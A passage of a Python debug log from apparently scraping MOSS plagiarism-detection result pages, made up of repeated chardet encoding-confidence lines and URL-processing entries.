0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5607356425475961\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5608145664859282\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match170-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match170-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match168-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match168-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match168-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match177-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match177-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match177-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 
0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25423\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25410\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24642\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25423\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25410\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25410\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25411\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24643\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25410\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.546674630352836\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24642\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match175-top.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 
0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5428618297264464\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5321814954628881\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match175-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match175-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match176-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match176-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match176-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match173-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match173-0.html\nDEBUG:root:Processing URL: 
http://moss.stanford.edu/results/374137986/match173-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 31463\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 31450\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 31463\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 31450\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40599\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 31450\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40586\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 31451\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40599\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 31450\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40586\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40586\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40587\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40586\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5278863498398251\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 
Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5588585707638614\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match178-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match178-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match178-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match171-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match171-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match171-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match172-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match172-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match172-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match174-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match174-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match174-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match179-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match179-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match179-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 
0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.544952431142531\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match181-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match181-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match181-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19115\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19102\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19115\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19102\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19102\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19103\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19102\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 20465\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5456726203364073\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not 
active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.544952431142531\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 20452\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 20465\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 20452\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match180-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek 
confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5607398546984015\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5440386035620236\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match180-0.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 20452\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match182-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match180-1.html\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 20453\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match182-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match182-1.html\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 20452\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 
